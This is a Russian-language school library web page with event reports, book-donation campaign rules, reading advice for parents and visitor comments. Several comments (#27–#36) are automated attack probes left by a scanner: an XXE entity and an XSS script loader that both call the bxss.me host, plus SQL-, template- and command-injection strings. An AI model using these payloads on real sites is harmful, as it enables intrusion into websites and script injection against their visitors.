Яндекс.Метрика

Поделись ссылкой на страницу с друзьями


Ребусы на тему БИБЛИОТЕКА. 

Ответы: (библиотека, книга, роман, сказка, стеллаж, формуляр, читатель)

От души поздравляем всем коллег с Днем библиотек. 

Люди, друзья, человеки,

Хранители знаний и мудрости —

Сотрудники библиотеки,

Пусть вас минуют трудности!

 

Пускай с вами будет удача

Всегда. И никак иначе!


   

   В рамках недели начальной школы в библиотеке совместно группой продлённого дня состоялось мероприятие "С чего начинается Родина". Ребята читали стихи, объясняли что для них означает Родина. Посмотрели карту Беларуси и узнали почему нашу страну называют "Синеокой".  Также просмотрели ролик, посвященный родному городу Бобруйску.  




Дорогие коллеги, попробуйте создать  облако слов на русском языке легко и просто с помощью сервиса Word's Cloud (https://wordscloud.pythonanywhere.com/)

Облако слов это интересный способ сделать краткое описания текста.

А вот и наш текст:

«Слово есть высший подарок Бога человеку», — говорил Н. В. Гоголь.  Бога, который Сам есть Слово и который весь мир сотворения Словом Своим (Ин 1,1—3). Помним ли мы о нашей ответственности за этот Дар?

Что из этого получилось!

Поиграйте с нами! Перемещайтесь в лабиринте к правильной зоне ответа, избегая при этом нападения врагов.


Книжная закладка своими руками

Книжная закладка, выполняя утилитарную функцию, помогает не только запоминать или быстро находить нужную страницу текста, но и элементарно работает на улучшение сохранности книжного издания (страницы не листаются читателями без надобности). Уже со времен рукописной книги закладка выполняла и эстетическую функцию, при этом мастера зачастую продумывали ее дизайн в сочетании с будущим или готовым переплетом книги. 

Вот какие интересные закладки можно сделать с помощью сервиса Canva. Canva — кроссплатформенный сервис для графического дизайна, основанный в 2012 году. Создание изображений в сервисе строится на принципе перетаскивания готовых элементов и варьировании изменяемых шаблонов. Графический редактор даёт доступ к встроенной библиотеке шаблонов, стоковых фотографий, иллюстраций и шрифтов.

А здесь вы можете узнать много нового об истории книжной закладки https://www.livemaster.ru/topic/129585-istoriya-knizhnoj-zakladki

Акция "Подари библиотеке книгу"

С 14 по 21 февраля в библиотеке проходила акция под девизом "Подари библиотеке книгу". В акции участвовали учащиеся начальной школы, родители и работники школы. Было подарено много новых интересных книг. Об этом хотелось бы немного рассказать.

Учащаяся 1 "А" класса Кравченко Татьяна подарила библиотеке книгу Дарьи Варренбург "Ульяна Караваева: Новые приключения". И очень смешные и сказочные книги из серии "История Заколдованного леса" П. Рэде "Прогулка с драконом" и "Секрет дракона". Ее одноклассница Храменкова Вера подарила библиотеке повесть-сказку Толкина Дж.Р.Р. "Хоббит, или туда и обратно", и не менее интересную книгу о жизни 12-летнего мальчика в провинциальном городке в Америке в начале XX "Пенрод" автора Б. Таркингтона. Еще одна учащаяся 1 "А" класса Сверж Софья поделилась с библиотекой книгой Иванова "Волшебный ручей Хомы и Суслика".

Учащиеся 1 "Б" класса подарили библиотеке 12 книг.

Учащиеся 1 "Е" класса порадовали книгами-сказками Качке Джуди "Мадагаскар-2. Побег в Африку. Дружба и в Африке дружба", книгами о Малыше и Карлсоне "Карлсон опять шутит" и "Карлсон вернулся".

Учащиеся 2 "Б" класса подарили библиотеке 12 книг.

1 книгу подарили учащиеся 3 "Г" класса.

Учащиеся 4 "В" класса подарили библиотеке 13 книг. Самые интересные из них:

  • Дойл   А.К. "Рассказы О Шерлоке Холмсе";
  • "Алиса в Зазеркалье";
  • "Чудо книга для малышей";
  • Носов Н. "Веселая семейка"             Подаренные книги ребята подписали напутственными подписями для будущих читателей.

Учащаяся 4 "Г" класса Чирейчик Мария подарила библиотеке серию замечательных книг о КЫШАХ. Блиновой М. Книги шикарно оформлены художником Сергеем Бордюгом. "Домик в подарок", "Птичка Сяпа", "Дело в шляпе".

Всего было подарено более 50 книг. От всей души благодарим наших бескорыстных добрых дарителей.

Благодарственное письмо дарителям





День 14 февраля, безусловно, известен, прежде всего, как День святого Валентина или День всех влюблённых. Однако, растёт число людей, которые знают ещё об одном празднике, отмечаемом в этот день. Ежегодно, начиная с 2012 года, 14 февраля отмечается Международный день дарения книг (International Book Giving Day). Есть праздники, родившиеся, благодаря вниманию ООН или других общественных организаций к проблемам международного характера, есть государственные праздники, религиозные, профессиональные и другие. Так или иначе, каждый из них имеет свою историю возникновения. День дарения книг – праздник, который стал международным не только по причине своей глобальной сути, но и потому, что корнями своими он вышел из народа, то есть инициатива его появления принадлежит одному обычному человеку – американке Эмми Бродмур – основательнице сайта детской книги в США. 

Участники Дня дарения книг 2017 года


 

 

 

День Дарения книг 2018 в библиотеке состоялся .

Ура! Ура! Ура!

Библиотеке было подарено более 150 книг.

Искренне благодарим всех щедрых дарителей.

Download
грамота.JPG
JPG Image 96.3 KB

 

Такой благодарностью можно поощрить своих неравнодушных дарителей.



Желаем чтобы в этом учебном году на вашу библиотеку пролился "настоящий подарочный книжный дождь".

Мне подарили книгу,
Редкий том –
Собранье удивительных историй:
Чужие судьбы,
Радости и горе,
И письма –
Знаменитостей притом.

Я книгу эту залпом прочитал.
Потом еще раз,
И еще,
И снова.
И все, о чем я некогда мечтал,
Сквозь жизнь чужую
Мне явило слово.
 
(А. Дементьев)


Конкурсы "Самый щедрый даритель" и "Лучший читающий класс" были оформлены в космическом стиле (в связи с проходящим в нашей стране Годом науки).

Я думаю, что в каждой библиотеке есть "Книжкина больница". Посмотрите на наших книжных докторов.

Подходит к концу учебный год 2015/2016. Весна в нашей библиотеке была богата на различные приятные события. В библиотеке и вообще в школе прошел день ученического самоуправления, состоялась неделя добрых дел,  подведены итого годового конкурса "Лучший читающий класс", "Самый активный читатель". Удачно завершилась акция "Подари книгу библиотеке" в рамках Недели добрых дел.


3 декабря Международный день инвалидов

Ежегодно 3 декабря во всем мире отмечают День инвалидов — международное мероприятие, направленное на привлечение внимания к интеграции инвалидов в жизнь общества. Официально дата проведения Международного дня инвалидов была провозглашена Генеральной Ассамблеей ООН в конце Десятилетия инвалидов ООН (1983-1992 года) в 1992 году. 
Проведение такого мероприятия в международном масштабе изначально было направлено на защиту достоинства инвалидов, организаторы ставили перед собой цель разъяснить как можно большему количеству людей всю тяжесть недостатка внимания для инвалидов. Со временем инвалиды стали принимать более активное участие в социальной, культурной, экономической и даже политической жизни стран ООН. 
В этот день государственные социальные службы проводят различные мероприятия и благотворительные акции.

Download
Буклет: "З декабря - Международный день инвалидов"
инвалид.rar
compressed file archive 1.7 MB
Download
Сценарий классного часа для учащихся 5 класса средней школы, посвященный Международному Дню инвалидов
Сценарий классного часа.doc
Microsoft Word Document 33.0 KB


Осень. Дабавь в оформление библиотеки яркие краски. Новые полочные разделители.



Download
Первые шаги к профессии
Программа начального образования сельских библиотекарей. Начинающему библиотекарю!
программа начального образования сельски
Microsoft Word Document 394.5 KB

Благотворительные акции в школьной библиотеке

Девчонки и мальчишки, 
А также их родители и классные руководители! 
Принять участие в акции 
Активно не хотите ли? 

 


Мы, библиотекари,  обращаемся к учащимся, педагогам, родителям, с просьбой принять участие в акции : «Прочел книгу - подари школьной библиотеке» 
Давайте объединим наши усилия и пополним библиотечный фонд хорошими и нужными для всех нас книгами.
Не оставайтесь равнодушными!!!

 

БЛАГОТВОРИТЕЛЬНАЯ АКЦИЯ «ПОДАРИ  ШКОЛЬНОЙ БИБЛИОТЕКЕ КНИЖКУ»

Дорогие друзья! Дарение – это особое явление. Это движение души, добрая воля дарителя! Объявленная акция  даст возможность продлить жизнь Вашим книгам. Целью является пополнение фонда библиотеки детской литературой отечественных писателей, так как главной проблемой всех школьных библиотек является комплектование книжного фонда. 
Если в Вашем доме есть прочитанные или дублетные детские книги С.Я. Маршака, С. Михалкова, К. Чуковского, Н. Носова, Б. Заходера, В. Драгунского и других русских писателей, то Вы можете поделиться ими. Библиотека с благодарностью примет в дар ВАШУ литературу. Подаренные книги Вы можете отметить дарственной надписью с указанием  своей фамилии и имени. И тогда Ваши книги еще не однажды доставят удовольствие  нашим маленьким читателям!

Обязательное условие – книги должны быть в хорошем состоянии!!!

 

"Книгу дома не пыли, 
Лучше школе подари. 
Пусть она ещё послужит 
 И  с ребятами подружит!"

 

Надеемся на ваше активное участие в акции!

 

Положение о проведении Акции «Подари школьной библиотеке книжку».

 

Акция проходит с ­­_____по _____ 201_ года с целью пополнения фонда школьной библиотеки новой литературой: произведениями классиков мировой художественной литературы, современных авторов, детских писателей, справочными и энциклопедическими изданиями, научно-популярной литературой.

 

Участники Акции: Учащиеся школы с 1 по 11 классы, родители учащихся школы и работники школы.

 

Условия и порядок проведения Акции:

 

1)Участие в акции осуществляется только на добровольной основе.

 

2)Дарение книг учащимися осуществляется с устного согласия с родителями.

 

3)Книги принимаются в хорошем состоянии.

 

4)Книги принимаются на безвозмездной основе.

 

5)Количество книг, подлежащих дарению, не ограничено.

 

6)Книги, подаренные библиотеке, обмену и возврату не подлежат.

 

Подведение итогов Акции:

 

1)Подаренные книги отмечаются надписью с указанием фамилии, имя, отчества дарителя.

 

2)По результатам Акции определяются самые активные участники, подарившие школе самое большое количество книг актуального содержания.

 

3)Самые активные участники Акции награждаются почетными грамотами.( взято с сайта http://academschool16.ru/index.php/ugolok-chitatelya/338-aktsiya-podari-shkolnoj-biblioteke-knigu)

 

 

На сайте http://bibliodom.ru/akciya-podari-knigu-biblioteke-2/html тоже обявление об акции "Подари книгу библиотеке". Такое объявление можно использовать как рекламное, а основным будет объявление помещенное выше, так как оно содержит Положение о проведении акции, условия проведения и т.д.

По такому типу можно проводить разные волонтерские акции в школьной библиотеке - по ремонту книг, по озеленению библиотеки и т.д.  

А вот такое творческое объявление на сайте  http://school94.ru/news/podari_knigu_shkolnoj_bibliotek/2011-02-04-58


Международный день космонавтики

Download
Гагарин.pdf
Adobe Acrobat Document 6.5 MB
Download
День космонавтики
сценарий
Сценарий.doc
Microsoft Word Document 52.5 KB

Библиотека. Книги. Родители.

                                                                  Все взрослые  были сначала детьми, только мало кто из них об этом помнит.

                                                                                                                                                        Антуан де Сент-Экзюпери.

 

 

Каждый взрослый человек приходит в свою теперешнюю жизнь из детства. От того, каким оно было – это начало начал – зависит наша жизнь.

Именно в детстве воспитываются умы и сердца. Вот почему воспитание маленького человека начинается, прежде всего, с самовоспитания взрослого. По-разному складывается жизнь каждой семьи в разные времена. Конечно, можно оглянуться на прошлые поколения и добрым словом вспомнить педагогику Макаренко, которая исходила из защиты беспризорного детства. И столь же гуманную педагогику Сухомлинского, которая согрела детей трудных послевоенных лет. Можно вспомнить и те семьи, в которые не вернулся отец, а матери нечем было накормить детей. Единственными воспитателями и кормильцами стали матери. Как, каким образом они находили в себе силы, мужество, чтобы создать ту атмосферу семьи, которая необходима для каждого ребенка. Какой бесконечной была их материнская доброта, каким бездонным было их терпение! И как могло случиться, что в семьях, достигших материального благополучия в наш век величайшего взлета науки, техники, культуры, наверное, больше чем когда-либо проявился дефицит взаимопонимания родителей с детьми. Дефицит внимания, ласки, доброты, дефицит взаимного общения. Чем объяснишь постыдное для общества количество детей в детских домах? Этот вопрос не повисает в воздухе. Социологи отвечают нам на него. А мы опять возвращаемся в детство наших детей.

Они красивы, наши дети. Хорошо сложенные, научились красиво одеваться. Они красиво причесаны, легко и пластично двигаются. И чего только они не умеют! Но это только внешне. Скажем прямо: не во всех из них достаточно сердечности, доброты, сострадания, деликатности – много из того, что обязательно для человека. Быть может, это горькие плоды нашей педагогической неграмотности? А может быть, и мы недостаточно понимаем, как создать в семье атмосферу взаимопонимания, чуткости, терпимости, сердечной доброты.

Роль пап, мам, бабушек и дедушек с годами становится все сложнее, ибо настоящий воспитатель – это всегда исследователь, фантазер и выдумщик. Это человек, сердце которого наполнено болью наших дней. Работа нашей библиотеки с родителями построена на принципе, который содержится в одном единственном предложении:

«Смотрим, слушаем, играем, читаем ВМЕСТЕ с детьми». В этом предложении неслучайно выделено слово «ВМЕСТЕ». Книги, которые предлагает наша библиотека, это книги особые, книги, которые родители смогут прочитать вместе со своими детьми. Книги, которые помогут им лучше понять друг друга, а значит, помогут взрослым в воспитании мировоззрения ребят. И хоть этот непоседа в эту самую минуту разлил кисель на скатерть, вымазал нос и щеки, и вообще еще ходит в коротких штанишках, мы уже говорим применительно к нему – мировоззрение. Ведь то, какую позицию мы изберем уже сейчас -  сберегая свой покой, приспособимся к тому, что считаем дурным, или воспитаем в своем ребенке любовь к прекрасному и протест против плохого – разве это не значит заложить основы его будущего мировоззрения?!

Итак, вместе. Это ведь так просто: семейные посещения театральных спектаклей, концертов, выставок, семейные походы на природу, семейный отдых, семейные чтения. Иные возразят: а дефицит свободного времени? А загруженность родителей и детей? Но вы все-таки находите время для общения, так пусть это будет педагогически продуманным и правильным.

Родители приходят в библиотеку вместе со своими малышами. Они хорошо информированы, и часто спрашивают: «Физику для малышей», «Математическую азбуку», «Малышам о звездах и планетах» и другие книги. Есть множество привлекательных, ярких, с фантазией написанных и оформленных книг, которые уже завоевали расположение родителей, и оценены ими по достоинству, но главное достоинство этих книг все в том же слове ВМЕСТЕ. Ведь только с взрослыми можно активно усвоить все богатство окружающего мира, а если это еще и игра, так это просто счастье для малыша – поиграть с взрослыми – ведь они все могут, все умеют, они такие выдумщики. Но в то же время, это не просто перспектива «уютного чтения». Правила игры значительно сложней. Когда книжка, это как бы книжка-процесс. Здесь и вопросы, и задания, ребенка приглашают к беседе, размышлению, требуют от него действия, дают «домашнее задание», и эта работа – совместная работа – поистине драгоценна, так как вызывает чувство единения маленьких и больших.

Основы прекрасного, существующие в обществе, человеке, природе, труде, искусстве, закладываются в детстве, и книга, как никакое другое средство воздействия способствует воспитанию в человеке не бесстрастного наблюдателя, а активного созидателя всех ценностей.

Первые шаги в мире прекрасного как раз не столь уж сложны. В раннем детстве, когда дети воспринимают красоту жизни наравне с солнечным светом, голубизной неба, пением птиц, именно в эту пору у них появляется активное стремление только наслаждаться, но и самому создавать красоту: рисовать, сочинять, играть, придумывать. И стоит только взрослым хотя бы намеком, неосторожным словом, действием выразить иронию, недовольство, что ребенок их отвлекает, что это им не интересно, это охладит ребенка, оттолкнет, и может, навсегда порвется какая-то важная связь с миром и семьей.

Конечно, это произойдет, не сиюминутно, не сразу, вам кажется, что все еще впереди, все еще поправимо, но этим самым вы будете обманывать себя до бесконечности, а разрыв между отцами и детьми будет увеличиваться. Старайтесь, если не все, то многое делать вместе, такая мудрая педагогика ставит заслон всему тому, чего мы не избежали и сами.

Есть еще воспитание примером. Малыш живет атмосферой семьи, следовательно, в доме нельзя забывать о высокой семейной культуре. Невозможно воспитать мужественного, благородного, честного сына, если перед его  глазами не будет достойного папы, дедушки, старшего брата. Под надзором ленивой неумехи мамы едва ли вырастет трудолюбивая дочь. Свои привычки, интересы, стиль поведения, отношение к труду, малыш лепит с нас, взрослых. Дети очень наблюдательны.

Дети – оценка всей нашей жизни. Ее смысл и продолжение. Они должны быть умными, добрыми, здоровыми, счастливыми, и сам процесс воспитания должен быть именно таким. Живая детская душа – хрупкий, нежный и одновременно податливый механизм. Он чутко отзывается на все вокруг, и на наши поступки тоже. Вот почему сегодняшний родитель должен постоянно воспитывать и самого себя. Д.Б.Кабалевский сказал: «Если бы все родители смогли дать своим детям хотя бы малость эстетической культуры, это привело бы к грандиозным результатом, ибо самые добрые ростки, посеянные школой в добрых душах, могут заглохнуть, если не получат поддержки в семье».

Возродить культ семьи, помочь человеку быть счастливым в семье – одна из сложнейших, но благородных и прекрасных задач. И наша библиотека не стоит в стороне от этого. Мы выработали такую систему работы с книгой, которая способствует воспитанию нравственности, привитию культуры чувств, этике семейно-бытовых отношений, формированию ответственного отношения к воспитанию детей.

Для того чтобы ребенок почувствовал потребность посещать библиотеку, перед ним и его родителями мы раскрываем богатство фонда библиотеки, учим пользоваться справочно-библиографическим аппаратом не только самого ребенка, но и его родителей. Среди форм и методов, самая естественная и органичная, это постоянное общение библиотекаря, ребенка и родителей. Совместный выбор книги, присутствие родителей при рекомендации книги их ребенку, на утренниках и других массовых мероприятиях дает нам возможность передать папам и мамам навыки работы с книгой и общения с читателем- ребенком.

Задача нашей библиотеки – всей своей деятельностью убеждать родителей в том, что, не смотря на увеличение в структуре детского чтения доли книг из домашней библиотеки, роль и значение школьной библиотеки в интеллектуальном и духовном становлении детей недооценивать нельзя. Именно в школьной библиотеке дети получают первое представление о необъятности книжного мира, учатся отбирать книги, правильно с ними обращаться. Общение с библиотекой полезно даже и тем, у кого дома много книг. Это помогает узнать, что читают другие ребята, посмотреть, что стоит на выставке, стать первым читателем только что полученной книги, поговорить о ней со сверстниками и библиотекарем. Кропотливая и творческая работа библиотеки с родителями приносит свои плоды: укрепляются контакты школьной библиотеки и семьи, что положительно сказывается на читательской активности, читательской культуре детей. Сотрудничество родителей с библиотекой убеждает в полезности чтения общественной книги, и заставляет посмотреть на библиотеку как на организатора интересного и полезного досуга, место неформального общения

В библиотеке школы работает абонемент и читальный зал (хотя и очень маленький), где раскрыта постоянно действующая выставка «Чтение -  дело семейное», а также представлены периодические  издания, адресованные и детям и родителям. Кроме того, родители наших учеников могут получить целый ряд информации в помощь семейному воспитанию: беседы по воспитанию детей и психологии детского чтения, картотеки, информационный стенд «Малыш становится читателем: правила для всех», рекомендательный список литературы «Библиотека, семья и я» и др. Таким образом, работа с семьей в библиотеке носит комплексный характер, включая в себя информационно-консультативную, психолого-педагогическую деятельность и организацию досуга.

Развитию творческих способностей детей, расширению их познавательных интересов помогла работа, проведенная под девизом «Разбуди в себе волшебника». В целях развития творчества и воображения у детей, ученикам 1А класса было предложено поучаствовать в конкурсе «Сказка, придуманная детьми». Родители помогли придумать, и красочно оформить на бумаге сказки малышам, которые еще не умеют писать. Работы были представлены на суд зрителей, а жюри, состоящее из зам.директора Куль А.Л., учителя Гайшун Л.В., библиотекарей и самых активных читателей, определило победителей. Победителям были вручены памятные грамоты и сладкие призы.

ХОЧЕТСЯ НАДЕЯТЬСЯ, что благодаря нашим усилиям, энтузиазму и желанию вложить в детские души все самое доброе, светлое, вечное, наши читатели вырастут хорошими людьми, а о книге сохранят самые теплые чувства, выраженные в стоках Марины Цветаевой:

 

Из рая детского житья

Вы мне привет прощальный шлете,

Неизменившие друзья

В потертом старом переплете.


Если вас интересует тема как составить  Примерное положение о библиотеке учреждения общего среднего образования и  примерная должностная инструкция библиотекаря учреждения общего среднего образования  см. здесь...

Download
Как составить Примерное положение о библ
Microsoft Word Document 36.9 KB

Вот еще кое-какие материалы  по работе с книгой. Может что-то пригодится.

Download
Книжкина больница
книжкина больница.docx
Microsoft Word Document 49.5 KB
Download
Живи, книга!
живи книга.docx
Microsoft Word Document 18.4 KB

Советы библиотекарям и родителям

 

  • Рассказывайте детям о ценности чтения. Показывайте связь чтения с их успехами в учебе и других делах. Приводите примеры положительного влияния книги на Вашу собственную жизнь или жизнь других людей.
  • Обращайте внимание детей на высказывания выдающихся людей о чтении. Не упускайте фактов, подтверждающих роль чтения в жизни тех, кто авторитетен для школьника: спортсменов, актеров, телезвезд. Поднимайте престиж книги и чтения в сознании ребенка.
  • Если Ваш ребенок читает в свободное от школьных занятий время, поинтересуйтесь, что за книга в его руках. Загляните в нее. Если, на Ваш взгляд, книга антигуманна, обсудите ее с ребенком, оцените ее с позиции добра и зла, предложите ему хорошую книгу.
  • Если Ваш ребенок делает лишь первые шаги в мир чтения, радуйтесь каждому прочитанному им слову как победе. Не привлекайте его внимания к ошибкам в чтении. Делайте это незаметно. Берите для первых чтений только подходящие книги — яркие, с крупным шрифтом, где много картинок и сюжет, за которым интересно следить.
  • Если Вы хотите, чтобы ребенок читал, надо, чтобы рядом с ним был читающий родитель, а еще лучше — читающий вместе с ребенком родитель. Пусть дети видят, как Вы сами читаете с удовольствием:  цитируйте, смейтесь, заучивайте отрывки, делитесь прочитанным. Этот пример может стать заразительным для них.
  • Поощряйте ребенка в посещении библиотеки и ее мероприятий. Берите его с собой, когда сами идете в библиотеку. Учите пользоваться ее фондами и справочным аппаратом. Консультируйтесь с библиотекарем в выборе книг ребенку.  Доверьтесь его рекомендациям как специалиста.
  • Подпишитесь на журналы для ребенка (на его имя!) с учетом его интересов и увлечений. Пусть ребенок вместе с вами выберет нужный журнал или газету из подписного каталога. Выбранные самостоятельно периодические издания он будет читать охотнее.
Flag Counter
Рейтинг сайтов

счетчик посещений
Рейтинг@Mail.ru
продвижение сайта москва, продвижение сайтов недорого
Comments: 36
  • #36

    e (Sunday, 10 February 2019 02:36)

    1

  • #35

    e (Sunday, 10 February 2019 02:33)

    1'"

  • #34

    e (Wednesday, 31 October 2018 10:18)

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE acunetix [
    <!ENTITY acunetixent SYSTEM "http://hitSYoqI7r1Ya.bxss.me/">
    ]>
    <xxx>&acunetixent;</xxx>

  • #33

    e (Wednesday, 31 October 2018 10:17)

    1'"()&%<acx><ScRiPt >Akbs(9016)</ScRiPt>

  • #32

    e (Wednesday, 31 October 2018 10:14)

    1'"

  • #31

    e (Wednesday, 31 October 2018 10:13)

    </script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013651&r=1920-205&h=1920-d7f77-2&/).slice(2),document.documentElement.appendChild(s))//'>

  • #30

    e (Wednesday, 31 October 2018 10:13)

    set|set&set

  • #29

    e (Wednesday, 31 October 2018 10:12)

    add

  • #28

    e (Wednesday, 31 October 2018 10:11)

    http://testasp.vulnweb.com/t/xss.html?%00.jpg

  • #27

    e (Wednesday, 31 October 2018 10:11)

    ${9999677+10000168}

  • #26

    Наталья (Saturday, 09 December 2017 13:53)

    Здравствуйте!Я не очень давно работаю в библиотеке и не специалист.У меня к Вам просьба,помогите написать выступление на МО зав.библиотек по теме"Популяризация белорусской литературы в школьной библиотеке".Даже не знаю с чего начать.Может у Вас есть какие-то наработки.Пожалуйста помогите.

  • #25

    Ирина (Tuesday, 05 December 2017 12:40)

    Здравствуйте! Сайт - просто находка! Все просто, доступно. Много нашла информации, которая полезна для самобразования. СПАСИБО!

  • #24

    Татьяна (Tuesday, 30 May 2017 08:14)

    Здравствуйте, коллеги. Сейчас начинается время каникул. Думаю у многих разработаны планы на период каникул. Поделитесь пожалуйста.

  • #23

    Нина (Thursday, 15 December 2016 07:26)

    Хорошая пословица, в ней все сказано: ВЕК ЖИВИ- ВЕК УЧИСЬ! Кажется, знаю все, работаю в школьной библиотеке давно, а все равно хочется ещё какую- то изюминку. Спасибо за материал, предоставленный Вами.

  • #22

    Наталья (Friday, 29 April 2016 07:15)

    Я прошу прощения за повторный вопрос, но все же "Как определить стоимость подаренной учеником книги, чтобы поставить ее на учет в бухгалтерии?"

  • #21

    наталья (Tuesday, 26 April 2016 09:07)

    как определить стоимость подаренной книги??

  • #20

    Любовь (Monday, 18 January 2016 06:28)

    Не знала про ваш сайт. Спасибо большое.

  • #19

    наталья (Thursday, 10 September 2015 13:33)

    И снова здравствуйте!Извините,что повторяю свою просьбу.Пожалуйста скиньте план работы на год 2015-2016г.Пожалуйста!!!!!!!!!!!!!!!!!!

  • #18

    наталья (Tuesday, 08 September 2015 14:10)

    Здравствуйте!Поздравляю Вас с новым учебным годом!!!Я опять с просьбой!План работы библиотеки на 2015-2016 уч.год можно?У меня такая большая нехватка книг,что до плана руки не доходят,а директор требует.Помогите пожалуйста!!!!!!!!!!!!

  • #17

    Нина (Wednesday, 02 September 2015 15:43)

    Девочки, а что это за новые льготы по оплате за учебники? Указ Президента РБ от 9.12.2014 года № 572 "О дополнительных мерах государственной поддержки семей, воспитывающих детей" . Никто не может доступно объяснить. Помогите!

  • #16

    Татьяна (Wednesday, 25 March 2015 14:58)

    Подскажите сроки хранения номенклатурной документации библиотеки

  • #15

    Магомед (Wednesday, 11 March 2015 07:31)

    Очень полезная и интересная ...

  • #14

    Ирина (Wednesday, 18 February 2015 15:30)

    Спасибо за такой интересный и полезный материал!

  • #13

    ирина (Wednesday, 28 January 2015 11:50)

    Спасибо за материал!

  • #12

    Ирина (Friday, 23 January 2015 12:48)

    Очень рада,что попала на Ваш сайт.Прекрасный материал!Спасибо!

  • #11

    ольга (Thursday, 22 January 2015 14:06)

    Какая вы молодец! я часто пользуюсь вашими материалами. Мне очень нравится!

  • #10

    Наталья (Monday, 12 January 2015 13:09)

    Здравствуйте!С прошедшими праздниками Вас!!!Здоровья и всего наилучшего!Вы не могли бы выложить Каталоги книг ( систематические, алфавитные, предметные за два последних года и статьи!Если не трудно,вы же все можете!Заранее благодарна!

  • #9

    Мария (Friday, 12 December 2014 11:19)

    Я очень люблю ваш сайт. Беру отсюда много полезного в работе

  • #8

    Наталья Комкова (Thursday, 11 December 2014 09:54)

    Спасибо всем работникам библиотеки и людям, создающим такие полезные сайты. Очень много интересного нашла для свой библиотеке. Желаю удачи, благодарных и аккуратных читателей, новых поступлений литературы. Директор муниципального казенного учреждения "Межпоселенческая центральная библиотека" Кадыйского муниципального района Костромской области.

  • #7

    Елена (Tuesday, 09 December 2014 05:15)

    здравствуйте! Огромное Вам спасибо, Ваши материала пригодятся мне в работе.

  • #6

    Ольга (Thursday, 27 November 2014 08:00)

    Спасибо! Полезная информация и применимая в работе. Спасибо!!!

  • #5

    мария (Tuesday, 25 November 2014 19:44)

    как здорово, что есть среди наших коллег такие вот профи, делающие хорошие дела для себя и для других

  • #4

    Анжелина (Monday, 24 November 2014)

    Какая Вы молодец! Находите время, делаете это с любовью и с открытой душой. Спасибо!!!

  • #3

    Людмила (Tuesday, 04 November 2014 14:17)

    Огромное спасибо, Ваши материалы очень полезны.

  • #2

    Наталья (Thursday, 25 September 2014 13:34)

    Здравствуйте!Очень жду Ваш план работы на 2014-2015 уч.год.Вы очень помогаете и облегчаете нашу библиотечную жизнь.Всего Вам хорошего !Здоровья,успехов!!!!!!!!!

  • #1

    Тамара (Wednesday, 06 August 2014 06:08)

    Дорогие Библиоштучки! Ваши материалы мне очень понравились, взяла некоторые для своей работы. Большое вам спасибо!